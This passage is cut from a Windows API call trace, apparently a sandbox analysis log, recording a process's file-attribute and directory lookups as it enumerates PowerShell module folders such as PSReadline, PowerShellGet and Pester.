nFileSizeLow=0xadf)) returned 1 [0159.383] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea98) returned 1 [0159.383] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff [0159.383] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psm1")) returned 0xffffffff [0159.383] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.cdxml")) returned 0xffffffff [0159.383] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.xaml")) returned 0xffffffff [0159.384] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.ni.dll")) returned 0xffffffff [0159.384] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.dll")) returned 0xffffffff [0159.384] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86deae4) returned 1 [0159.384] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x36 [0159.384] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x36, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0159.384] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\*", lpFindFileData=0x86de80c | out: lpFindFileData=0x86de80c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4631b23a, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4631b23a, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76d3d90 [0159.384] FindNextFileW (in: hFindFile=0x76d3d90, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4631b23a, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4631b23a, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.384] FindNextFileW (in: hFindFile=0x76d3d90, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb5477959, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfff2ff0e, ftLastWriteTime.dwHighDateTime=0x1d1a04a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1", cAlternateFileName="")) returned 1 [0159.384] FindNextFileW (in: hFindFile=0x76d3d90, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb54d73e5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b2558c7, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.2", cAlternateFileName="")) returned 1 [0159.385] FindNextFileW (in: hFindFile=0x76d3d90, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0159.385] FindClose (in: hFindFile=0x76d3d90 | out: hFindFile=0x76d3d90) returned 1 [0159.385] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86deaa0) returned 1 [0159.385] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86deaac) returned 1 [0159.385] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0159.385] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x4a, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0159.385] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea78) returned 1 [0159.385] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\psreadline.psd1"), fInfoLevelId=0x0, lpFileInformation=0x86deaf4 | out: lpFileInformation=0x86deaf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a64f261, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5dec600, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5dec600, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2f6)) returned 1 [0159.387] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea74) returned 1 [0159.388] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0159.388] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x4a, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0159.388] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0159.388] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x4a, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0159.388] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea9c) returned 1 [0159.388] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\psreadline.psd1"), fInfoLevelId=0x0, lpFileInformation=0x538b13c | out: lpFileInformation=0x538b13c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a64f261, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5dec600, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5dec600, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2f6)) returned 1 [0159.388] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea98) returned 1 [0159.388] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0159.388] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x4a, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0159.388] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea78) returned 1 [0159.388] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\psreadline.psd1"), fInfoLevelId=0x0, lpFileInformation=0x86deaf4 | out: lpFileInformation=0x86deaf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e1)) returned 1 [0159.394] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea74) returned 1 [0159.394] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0159.394] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x4a, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0159.394] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0159.394] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x4a, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0159.394] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea9c) returned 1 [0159.394] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\psreadline.psd1"), fInfoLevelId=0x0, lpFileInformation=0x538b394 | out: lpFileInformation=0x538b394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e1)) returned 1 [0159.394] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea98) returned 1 [0159.395] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.psd1")) returned 0xffffffff [0159.395] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.psm1")) returned 0xffffffff [0159.395] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.cdxml")) returned 0xffffffff [0159.395] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.xaml")) returned 0xffffffff [0159.395] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.ni.dll")) returned 0xffffffff [0159.395] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.dll")) returned 0xffffffff [0159.397] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\fd1hvy\\documents\\windowspowershell\\modules")) returned 0xffffffff [0159.439] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules" (normalized: "c:\\program files (x86)\\windowspowershell\\modules")) returned 0x10 [0159.441] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86deae4) returned 1 [0159.441] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x31 [0159.441] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules", nBufferLength=0x31, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x30 [0159.441] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\*", lpFindFileData=0x86de80c | out: lpFindFileData=0x86de80c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c48de1, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc65e250, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c6f037, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76d4290 [0159.495] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c48de1, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc65e250, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c6f037, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.495] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c48de1, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc65e8f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c48de1, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Operation.Validation", cAlternateFileName="MICROS~1.VAL")) returned 1 [0159.495] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc717ae6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c6f037, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0159.496] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4698376a, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4698376a, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester", cAlternateFileName="")) returned 1 [0159.496] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc9fecb3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c6f037, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0159.496] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0159.496] FindClose (in: hFindFile=0x76d4290 | out: hFindFile=0x76d4290) returned 1 [0159.497] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86deaa0) returned 1 [0159.497] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86deaac) returned 1 [0159.497] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.psd1")) returned 0xffffffff [0159.498] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.psm1")) returned 0xffffffff [0159.498] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.cdxml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.cdxml")) returned 0xffffffff [0159.498] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.xaml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.xaml")) returned 0xffffffff [0159.498] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.ni.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.ni.dll")) returned 0xffffffff [0159.498] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.dll")) returned 0xffffffff [0159.498] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5b [0159.498] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", nBufferLength=0x5b, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", lpFilePart=0x0) returned 0x5a [0159.499] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.499] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.powershell.operation.validation"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c48de1, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc65e8f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c48de1, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.504] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x43 [0159.504] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x43, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x42 [0159.504] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.504] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc717ae6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c6f037, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.504] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.504] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x38 [0159.505] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x38, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x37 [0159.505] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.505] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\pester"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4698376a, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4698376a, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.505] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3f [0159.505] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x3f, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x3e [0159.505] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.505] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc9fecb3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c6f037, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.506] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.506] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86deae4) returned 1 [0159.506] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5b [0159.506] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", nBufferLength=0x5b, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", lpFilePart=0x0) returned 0x5a [0159.506] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\*", lpFindFileData=0x86de80c | out: lpFindFileData=0x86de80c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c48de1, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc65e8f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c48de1, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76d42d0 [0159.507] FindNextFileW (in: hFindFile=0x76d42d0, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c48de1, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc65e8f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c48de1, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.507] FindNextFileW (in: hFindFile=0x76d42d0, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c48de1, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc70c3d2, 